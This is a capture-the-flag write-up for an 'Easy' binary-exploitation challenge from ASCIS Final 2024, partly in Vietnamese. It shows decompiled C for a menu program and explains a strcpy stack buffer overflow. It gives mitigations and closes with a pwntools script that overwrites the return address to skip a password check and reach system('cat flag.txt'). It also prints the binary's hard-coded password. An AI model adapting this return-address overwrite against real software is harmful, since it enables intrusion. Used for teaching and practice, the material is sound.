ASCIS Final 2024


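Vulnerability: quantum_entangle() ngầm giả định kích thước src <= dest, nhưng lại dùng strcpy() (không kiểm tra độ dài) để copy input tối đa 128 bytes (fgets trong main() đọc tối đa 127 ký tự + NUL) vào buffer dest chỉ có 64 bytes, dẫn đến stack buffer overflow.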

January 13, 2026 October 15, 2025 Easy
Author: Hung Nguyen Tuong

Source Code

main()

// Entry point of the challenge binary (decompiler output): seeds rand() with the
// current time, then runs a four-option text menu until the user picks 4.
//
// Security-relevant observations, all from the lines below:
//  - Option 1 reads up to 127 characters + NUL into the 128-byte `buffer` (safe by
//    itself) and hands it to quantum_entangle(), which copies it into a 64-byte
//    local with strcpy(). The length is never checked before that call.
//  - The return value of scanf() is ignored, so on non-numeric input `choice`
//    keeps its previous value (uninitialized on the first iteration).
//  - secret_lab() is not called from this function.
int __fastcall main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax
  int choice; // [rsp+Ch] [rbp-84h] BYREF
  char buffer[128]; // [rsp+10h] [rbp-80h] BYREF

  // setup() is not shown on this page; presumably I/O buffering setup -- TODO confirm.
  setup(argc, argv, envp);
  // Time-based seed: the rand() values shown by print_coordinates() are predictable.
  v3 = time(0);
  srand(v3);
  while ( 1 )
  {
    puts("\nQuantum Teleporter Menu:");
    puts("1. Enter coordinates");
    puts("2. View current coordinates");
    puts("3. Initiate teleportation");
    puts("4. Exit");
    printf("Enter your choice: ");
    // Unchecked scanf(): a failed conversion leaves `choice` unchanged.
    scanf("%d", &choice);
    // Consumes one character after the number (normally the newline) so the
    // fgets() in case 1 does not read an empty line.
    getchar();
    if ( choice == 4 )
      break;
    if ( choice > 4 )
      goto invalid_choice;
    // Values <= 0 fall through to `default` and are rejected there.
    switch ( choice )
    {
      case 3:
        teleport();
        break;
      case 1:
        printf("Enter quantum coordinates: ");
        // Bounded read: at most 127 characters plus the terminating NUL.
        fgets(buffer, 128, stdin);
        // Overflow site: the callee copies this (up to 128 bytes) into char dest[64].
        quantum_entangle(buffer);
        break;
      case 2:
        print_coordinates();
        break;
      default:
invalid_choice:
        puts("Invalid choice. Please try again.");
        break;
    }
  }
  puts("Exiting Quantum Teleporter. Goodbye!");
  return 0;
}

quantum_entangle()

// Copies the caller's string into a 64-byte stack buffer with strcpy() and
// returns strcpy()'s result, i.e. the address of that local buffer.
//
// This is the vulnerable function (CWE-121, stack-based buffer overflow):
//  - strcpy() copies until the first NUL with no regard for sizeof(dest).
//  - main() passes a string of up to 127 characters + NUL, so up to 64 bytes
//    can be written past the end of `dest`.
//  - Per the decompiler annotation, `dest` starts at rbp-0x40; the bytes after
//    it are the saved rbp and then the return address.
//  - No stack-canary check appears in this decompilation; presumably the binary
//    was built without one -- TODO confirm with checksec.
//  - The returned pointer refers to `dest`, which is dead once the function
//    returns; main() ignores it.
// Fix direction: bound the copy to sizeof(dest) or reject over-long input.
char *__fastcall quantum_entangle(const char *buffer)
{
  char dest[64]; // [rsp+10h] [rbp-40h] BYREF

  return strcpy(dest, buffer);
}

print_coordinates()

// Prints three pseudo-random "coordinates", each reduced modulo 1000, and
// returns printf()'s result. No user input is involved.
// rand() is called in the order Z, Y, X; the generator is seeded with time(0)
// in main(), so the values are predictable and must not be treated as secret.
int print_coordinates()
{
  int Z; // r12d
  int Y; // ebx
  int X; // eax

  Z = rand() % 1000;
  Y = rand() % 1000;
  X = rand();
  // X is reduced modulo 1000 here, in the argument list, rather than at assignment.
  return printf("Current coordinates: X=%d, Y=%d, Z=%d\n", X % 1000, Y, Z);
}

teleport()

// Cosmetic menu action: prints a message, sleeps for two seconds, prints a
// second message and returns the result of that last puts(). It takes no input
// and touches no shared state.
int teleport()
{
  puts("Initiating quantum teleportation...");
  sleep(2u);
  return puts("Teleportation successful!");
}

secret_lab()

// Password-gated routine that prints flag.txt. None of the functions shown on
// this page calls it, so it is reachable only through a hijacked control flow.
//
// Security-relevant observations:
//  - The password is a hard-coded string literal, so anyone holding the binary
//    can recover it (CWE-798).
//  - The password check protects only the function entry. Control transferred
//    to an address after the strcmp() branch reaches system() without it.
//  - system() runs the command through the shell, with `cat` resolved via PATH
//    and flag.txt relative to the current working directory.
int secret_lab()
{
  char pw[16]; // [rsp+0h] [rbp-10h] BYREF

  printf("Enter the secret lab password: ");
  // Bounded read: at most 15 characters plus NUL, so no overflow here.
  fgets(pw, 16, stdin);
  // Strip the trailing newline (if any) before comparing.
  pw[strcspn(pw, "\n")] = 0;
  if ( strcmp(pw, "qu4ntumR3ality") )
  {
    puts("Access denied. Intruder alert!");
    exit(1);
  }
  puts("Access granted to the secret lab!");
  return system("cat flag.txt");
}

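Mitigation

Trong quantum_entangle(), thay strcpy() bằng thao tác copy có giới hạn theo kích thước dest, ví dụ snprintf(dest, sizeof dest, "%s", buffer), hoặc kiểm tra strlen(buffer) < sizeof dest và từ chối input quá dài. Ngoài ra nên build với các cơ chế bảo vệ của compiler (-fstack-protector-strong, -D_FORTIFY_SOURCE=2, -fPIE -pie) để việc ghi đè return address khó bị lợi dụng hơn, và không để lại trong binary một hàm như secret_lab() với password hard-code và lệnh system().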

Solve

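Chỉ cần ghi đè return address của quantum_entangle() để nhảy thẳng đến lệnh return system("cat flag.txt"); trong secret_lab() (tức là bỏ qua bước kiểm tra password) là xong. Offset đến return address là 72 bytes: 64 bytes của dest cộng 8 bytes saved rbp.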

Script

from pwn import *

# Local proof-of-concept for the overflow in quantum_entangle(); it starts the
# challenge binary ./chall as a child process (no remote target involved).
p = process('./chall')
# ELF() is used only to look up the static address of secret_lab. No address
# leak is performed, so this presumably relies on the binary being non-PIE --
# confirm with checksec.
elf = ELF('./chall')

# Menu option 1 is the only path in the decompiled main() that reaches
# quantum_entangle().
p.sendlineafter(b'choice: ', b'1')

# 72 bytes of padding = 64-byte dest (at rbp-0x40) + 8-byte saved rbp; the next
# 8 bytes replace the saved return address.
# The +120 offset is specific to this build: presumably it lands on the
# system("cat flag.txt") call after the password check -- verify in the
# disassembly before reusing it on another build.
p.sendlineafter(b'coordinates: ', b'a' * 72 + p64(elf.symbols['secret_lab'] + 120))

# Read everything the process prints until it exits.
print(p.recvall().decode())